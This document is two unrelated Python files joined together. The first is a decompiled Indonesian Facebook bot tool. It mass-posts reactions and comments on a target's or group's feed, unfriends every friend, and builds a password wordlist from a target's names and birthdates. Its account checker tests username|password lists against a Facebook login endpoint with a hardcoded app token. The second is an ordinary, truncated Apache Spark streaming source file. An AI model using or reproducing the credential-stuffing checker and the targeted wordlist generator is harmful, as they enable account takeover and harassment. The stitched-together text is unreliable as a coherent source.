print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] Tidak ada permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Kembali'
print
pilih_lain()
def pilih_lain():
other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 40 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Gagal membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 40 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 40 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Kembali'
print
g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
# okay decompiling 3.pyc
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import sys
from py4j.java_gateway import java_import, JavaObject
from pyspark import RDD, SparkConf
from pyspark.serializers import NoOpSerializer, UTF8Deserializer, CloudPickleSerializer
from pyspark.context import SparkContext
from pyspark.storagelevel import StorageLevel
from pyspark.streaming.dstream import DStream
from pyspark.streaming.util import TransformFunction, TransformFunctionSerializer
__all__ = ["StreamingContext"]
def _daemonize_callback_server():
"""
Hack Py4J to daemonize callback server
The thread of callback server has daemon=False, it will block the driver
from exiting if it's not shutdown. The following code replace `start()`
of CallbackServer with a new version, which set daemon=True for this
thread.
Also, it will update the port number (0) with real port
"""
# TODO: create a patch for Py4J
import socket
import py4j.java_gateway
logger = py4j.java_gateway.logger
from py4j.java_gateway import Py4JNetworkError
from threading import Thread
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,
1)
try:
self.server_socket.bind((self.address, self.port))
if not self.port:
# update port with real port
self.port = self.server_socket.getsockname()[1]
except Exception as e:
msg = 'An error occurred while trying to start the callback server: %s' % e
logger.exception(msg)
raise Py4JNetworkError(msg)
# Maybe thread needs to be cleanup up?
self.thread = Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
py4j.java_gateway.CallbackServer.start = start
class StreamingContext(object):
"""
Main entry point for Spark Streaming functionality. A StreamingContext
represents the connection to a Spark cluster, and can be used to create
L{DStream} various input sources. It can be from an existing L{SparkContext}.
After creating and transforming DStreams, the streaming computation can
be started and stopped using `context.start()` and `context.stop()`,
respectively. `context.awaitTermination()` allows the current thread
to wait for the termination of the context by `stop()` or by an exception.
"""
_transformerSerializer = None
def __init__(self, sparkContext, batchDuration=None, jssc=None):
"""
Create a new StreamingContext.
@param sparkContext: L{SparkContext} object.
@param batchDuration: the time interval (in seconds) at which streaming
data will be divided into batches
"""
self._sc = sparkContext
self._jvm = self._sc._jvm
self._jssc = jssc or self._initialize_context(self._sc, batchDuration)
def _initialize_context(self, sc, duration):
self._ensure_initialized()
return self._jvm.JavaStreamingContext(sc._jsc, self._jduration(duration))
def _jduration(self, seconds):
"""
Create Duration object given number of seconds
"""
return self._jvm.Duration(int(seconds * 1000))
@classmethod
def _ensure_initialized(cls):
SparkContext._ensure_initialized()
gw = SparkContext._gateway
java_import(gw.jvm, "org.apache.spark.streaming.*")
java_import(gw.jvm, "org.apache.spark.streaming.api.java.*")
java_import(gw.jvm, "org.apache.spark.streaming.api.python.*")
# start callback server
# getattr will fallback to JVM, so we cannot test by hasattr()
if "_callback_server" not in gw.__dict__:
_daemonize_callback_server()
# use random port
gw._start_callback_server(0)
